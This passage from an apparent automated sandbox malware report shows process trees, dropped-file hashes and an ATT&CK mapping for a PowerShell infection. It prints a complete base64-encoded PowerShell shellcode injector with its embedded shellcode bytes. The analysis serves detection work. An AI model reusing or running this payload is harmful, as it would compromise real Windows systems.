ACQAUQBNAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABRAE0AcABXACAAJABlACIAOwB9AA==
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2892

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABQAHkARwAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFAAeQBHACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABjADUALAAwAHgAYgBhACwAMAB4ADQAOAAsADAAeABkADEALAAwAHgAZgBmACwAMAB4ADkANgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANQA2ACwAMAB4ADEANwAsADAAeAA4ADMALAAwAHgAZQBlACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgAMQBlACwAMAB4AGMAMgAsADAAeAAxAGQALAAwAHgANgAzACwAMAB4ADYAMgAsADAAeAAwAGMALAAwAHgANgBlACwAMAB4ADgAYwAsADAAeAA5AGEALAAwAHgAYwBkACwAMAB4ADEAMQAsADAAeAAwADQALAAwAHgANwBmACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgANwAyACwAMAB4AGYANAAsADAAeABhAGQALAAwAHgAOQAzACwAMAB4AGYAMAAsADAAeAA1ADgALAAwAHgANQBlACwAMAB4ADUAZgAsADAAeAA1ADQALAAwAHgANAA4ACwAMAB4AGQANQAsADAAeAAyAGQALAAwAHgANwAxACwAMAB4ADQAMQAsADAAeAAxADYALAAwAHgAZABlACwAMAB4ADMANgAsADAAeABlAGIALAAwAHgAYwBlACwAMAB4AGQAMAAsADAAeABmADgALAAwAHgANAA3ACwAMAB4ADMAMgAsADAAeAA3ADIALAAwAHgAOAA1ACwAMAB4ADkANQAsADAAeAA2ADcALAAwAHgANQA0ACwAMAB4AGIANAAsADAAeAA1ADYALAAwAHgANwBhACwAMAB4ADkANQAsADAAeABmADEALAAwAHgAMgAxACwAMAB4AGYAMAAsADAAeAA3AGEALAAwAHgAYQBmACwAMAB4ADMAYQAsADAAeABhADgALAAwAHgAOQA0ACwAMAB4ADAANwAsADAAeABiADcALAAwAHgAMABmACwAMAB4AGEAOQAsADAAeABhADYALAAwAHgAMQA3ACwAMAB4ADAANAAsADAAeAA5ADEALAAwAHgAZAAwACwAMAB4ADEAMgAsADAAeABkAGIALAAwAHgANgA2ACwAMAB4ADYAZAAsADAAeAAxAGQALAAwAHgAMABjACwAMAB4ADAAZAAsADAAeAAzADUALAAwAHgAMwBkACwAMAB4AGEAZAAsADAAeABjADEALAAwAHgANABkACwAMAB4ADcANQAsADAAeABiADUALAAwAHgAYgA1ACwAMAB4AGQANAAsADAAeAA0AGMALAAwAHgAYgAxACwAMAB4ADAAOQAsADAAeAA5AGUALAAwAHgANwBmACwAMAB4AGMANQAsADAAeABmADkALAAwAHgAMQA0ACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgAMgA4ACwAMAB4ADYANQAsADAAeABjAGEALAAwAHgAZgBhACwAMAB4ADEAYgAsADAAeAA4AGIALAAwAHgANgA2ACwAMAB4AGYAZAAsADAAeAA2ADQALAAwAHgAYQBjACwAMAB4ADkANgAsADAAeAA4AGIALAAwAHgAOQBlACwAMAB4AGMAZQAsADAAeAAyAGIALAAwAHgAOABjACwAMAB4ADYANAAsADAAeABhAGMALAAwAHgAZgA3ACwAMAB4ADEAOQAsADAAeAA3AGIALAAwAHgAMQA2ACwAMAB4ADcAYwAsADAAeABiADkALAAwAHgANQBmACwAMAB4AGEANgAsADAAeAA1ADEALAAwAHgANQBjACwAMAB4ADIAYgAsADAAeABhADQALAAwAHgAMQBlACwAMAB4ADIAYQAsADAAeAA3ADMALAAwAHgAYQA5ACwAMAB4AGEAMQAsADAAeABmAGYALAAwAHgAMABmACwAMAB4AGQANQAsADAAeAAyAGEALAAwAHgAZgBlACwAMAB4AGQAZgAsADAAeAA1AGYALAAwAHgANgA4ACwAMAB4ADIANQAsADAAeABjADQALAAwAHgAMAA0ACwAMAB4ADIAYgAsADAAeAA0ADQALAAwAHgANQBkACwAMAB4AGUAMQAsADAAeAA5AGEALAAwAHgANwA5ACwAMAB4AGIAZAAsADAAeAA0AGQALAAwAHgANAAzACwAMAB4AGQAYwAsADAAeABiADUALAAwAHgANwBjACwAMAB4ADkAMgAsADAAeAA2ADAALAAwAHgAMwA2ACwAMAB4ADcAZgAsADAAeAA5AGIALAAwAHgAMwBjACwAMAB4AGEAMQAsADAAeABiADMALAAwAHgANQAxACwAMAB4AGIAZgAsADAAeAAzADEALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeABjAGMALAAwAHgAMAAzACwAMAB4ADQAMwAsADAAeAA1ADgALAAwAHgANQBiACwAMAB4ADIAOAAsADAAeAAwAGMALAAwAHgANAA2ACwAMAB4ADkAYwAsADAAeAAzADkALAAwAHgAMQBhACwAMAB4ADcAOQAsADAAeAA3ADIALAAwAHgAOAAxACwAMAB4ADQAYgAsADAAeAA4ADQALAAwAHgANwAzACwAMAB4AGYAMgAsADAAeAA0ADIALAAwAHgANAAyACwAMAB4ADIANwAsADAAeABhADIALAAwAHgAZgBjACwAMAB4ADYAMwAsADAAeAA0ADgALAAwAHgAMgA5ACwAMAB4AGYAZAAsADAAeAA4AGMALAAwAHgAOQBkACwAMAB4AGMANAAsADAAeABmADcALAAwAHgAMQBhACwAMAB4AGQAZQAsADAAeABiADEALAAwAHgAMAA0ACwAMAB4ADUAYQAsADAAeABiADYALAAwAHgAYwAzACwAMAB4ADEANAAsADAAeAA0AGYALAAwAHgAZQBmACwAMAB4ADQAZAAsADAAeABmADIALAAwAHgAMwBmACwAMAB4AGIAZgAsADAAeAAxAGQALAAwAHgAYQBiACwAMAB4AGYAZgAsADAAeAA2AGYALAAwAHgAZABlACwAMAB4ADEAYgAsADAAeAA5ADcALAAwAHgANgA1ACwAMAB4AGQAMQAsADAAeAA0ADQALAAwAHgAOAA3ACwAMAB4ADgANQAsADAAeAAzAGIALAAwAHgAZQBkACwAMAB4ADIAZAAsADAAeAA2AGEALAAwAHgAOQAyACwAMAB4ADQANQAsADAAeABkADkALAAwAHgAMQAzACwAMAB4AGIAZgAsADAAeAAxAGUALAAwAHgANwA4ACwAMAB4AGQAYgAsADAAeAAxADUALAAwAHgANQBiACwAMAB4AGIAYQAsADAAeAA1ADcALAAwAHgAOQBhACwAMAB4ADkAYgAsADAAeAA3ADQALAAwAHgAOQAwACwAMAB4AGQANwAsADAAeAA4AGYALAAwAHgAZQAwACwAMAB4ADUAMAAsADAAeABhADIALAAwAHgAZgAyACwAMAB4AGEANgAsADAAeAA2AGYALAAwAHgAMQA4ACwAMAB4ADkAOAAsADAAeAA0ADYALAAwAHgAZgBhACwAMAB4AGEANwAsADAAeAAwAGIALAAwAHgAMQAxACwAMAB4ADkAMgAsADAAeABhADUALAAwAHgANgBhACwAMAB4ADUANQAsADAAeAAzAGQALAAwAHgANQA1ACwAMAB4ADUAOQAsADAAeABlAGUALAAwAHgAZgA0ACwAMAB4AGMAMwAsADAAeAAyADIALAAwAHgAOQA4ACwAMAB4AGYAOAAsADAAeAAwADMALAAwAHgAYQAzACwAMAB4ADUAOAAsADAAeABhAGYALAAwAHgANAA5ACwAMAB4AGEAMwAsADAAeAAzADAALAAwAHgAMQA3ACwAMAB4ADIAYQAsADAAeABmADAALAAwAHgAMgA1ACwAMAB4ADUAOAAsADAAeABlADcALAAwAHgANgA0ACwAMAB4AGYANgAsADAAeABjAGQALAAwAHgAMAA4ACwAMAB4AGQAZAAsADAAeABhAGIALAAwAHgANAA2ACwAMAB4ADYAMQAsADAAeABlADMALAAwAHgAOQAyACwAMAB4AGEAMQAsADAAeAAyAGUALAAwAHgAMQBjACwAMAB4AGYAMQAsADAAeAAzADMALAAwAHgAMQAyACwAMAB4AGMAYgAsADAAeAAzAGYALAAwAHgANAA2ACwAMAB4ADcAYQAsADAAeABjAGYAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEgAbABwAFcAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEgAbABwAFcALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEgAbABwAFcALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2576

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bvgmhqgs.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:2704

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2379.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2378.tmp"
6⤵
PID:2828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES2379.tmp

Filesize
1KB

MD5
c51f779bd4d7d4ebb0ae0de13f332f68

SHA1
293d37b45b0770340913bd7d8a711d7401640161

SHA256
94a93411c62df4e4c3f73e14b1d3984edb00d7b1994e2b3cf4d45fc0b4ca5981

SHA512
fe2f44ff73e382f944f2a70c4d009d67cfb6d9538e0c4ef8eeeaf11f9ec7e952bdc2a66dec2c539d7f48a0a06bba6957a1f3b0a130d14263e813acbd6bdb13d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\bvgmhqgs.dll

Filesize
3KB

MD5
2b1d22e7c4ca3d10b2971d66e7082a7c

SHA1
c5a128cee2fb3d2397a1aba30048b6a0c66734a5

SHA256
fce5d45fc0314207a03042fc663505e0b58b767e3ff1445c6d332df8f988e3c3

SHA512
c1e47b280df78f0a79e0832e481b78dc5b540b1a38c2613afd0e075aab2abaae5cbff0bff7c189ae2bc08ab4123e3fb026dd6781df064514f3442304f586360c

Download Submit
C:\Users\Admin\AppData\Local\Temp\bvgmhqgs.pdb

Filesize
7KB

MD5
1c38c2441f04e2a181efbf10acea4b14

SHA1
6801a0a76913683a6dbe4c8214a5bc0affa1bef3

SHA256
2eec29b13f10d0c83315b2c7a06eeb6ffec100ee9547e63fe207e84ed8580c08

SHA512
1c0968ab0aa06ea96ea0dd01c35564036e5468df22c51a2457ef8696e3d84276cf800f1bece7610ae728ecbe0bb8ba4ab04c4553d3b2f8a61c136b86df0cc238

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SU94Y444JUCB2Y9H19S4.temp

Filesize
7KB

MD5
5a4a7411513fd2ec538e3d5ed5583172

SHA1
38b02b8074efc269d8102e3430464a98311c190c

SHA256
9f200b419fabc3f0ecf294b559dae32e97a6a1230b0be12e96b8aa5d04fe1bc8

SHA512
c4fbbc87eb4604dae09afdd0dc7d530bc0df965c9070a2903515cc98c0181b2e5125beb79d37010f91cb00fea55053b2538db1a5aa20084b4509b04bfe043f25

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC2378.tmp

Filesize
652B

MD5
7b91a126f21ef6c830e890dfec50a5ad

SHA1
854a54975abadce206786ecd370cfc2e0a8b2f24

SHA256
ebe255dd9e9730a33de5d8af5354d99bb70bb14890cc5d5cecc136a89b09d358

SHA512
ae5f8692019d89cdb9bda746972d9cf0aa73c473b081558f73b5f3b982589620b5b0dc43b61dc3d38ac78aeb96ad3992505436b4951c93ae02eb4ceb75bd7e5c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bvgmhqgs.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bvgmhqgs.cmdline

Filesize
309B

MD5
205f2c89fb2d416ffb3ccfdf6c9ab6e2

SHA1
48d2aee15d60f6247d39c51e8dab772ca47a9c1d

SHA256
5fe09ed11adbb1e87901722721118b3b0495adc70bde6e31cf3999024308b680

SHA512
7616e5692d3860ee5d3ac944b98cb6fc3580ec7961d20f387f894561cc5e7ae18e91e5fd5d4e112fc28e6b0dbaf94bea08357a9c644be63aa3d302b9ef6899ae

Download Submit
memory/2136-0-0x000007FEF5783000-0x000007FEF5784000-memory.dmp

Filesize
4KB

Download
memory/2136-31-0x000007FEF5783000-0x000007FEF5784000-memory.dmp

Filesize
4KB

Download
memory/2136-1-0x0000000000A10000-0x0000000000A1A000-memory.dmp

Filesize
40KB

Download
memory/2576-30-0x0000000005480000-0x0000000005481000-memory.dmp

Filesize
4KB

Download
memory/2892-10-0x000007FEF3720000-0x000007FEF40BD000-memory.dmp

Filesize
9.6MB

Download
memory/2892-8-0x0000000002250000-0x0000000002258000-memory.dmp

Filesize
32KB

Download
memory/2892-7-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

Filesize
2.9MB

Download
memory/2892-6-0x000007FEF39DE000-0x000007FEF39DF000-memory.dmp

Filesize
4KB

Download
memory/2892-11-0x000007FEF3720000-0x000007FEF40BD000-memory.dmp

Filesize
9.6MB

Download
memory/2892-9-0x000007FEF3720000-0x000007FEF40BD000-memory.dmp

Filesize
9.6MB

Download
memory/2892-12-0x000007FEF3720000-0x000007FEF40BD000-memory.dmp

Filesize
9.6MB

Download
memory/2892-32-0x000007FEF3720000-0x000007FEF40BD000-memory.dmp

Filesize
9.6MB

Download
memory/2892-33-0x000007FEF39DE000-0x000007FEF39DF000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads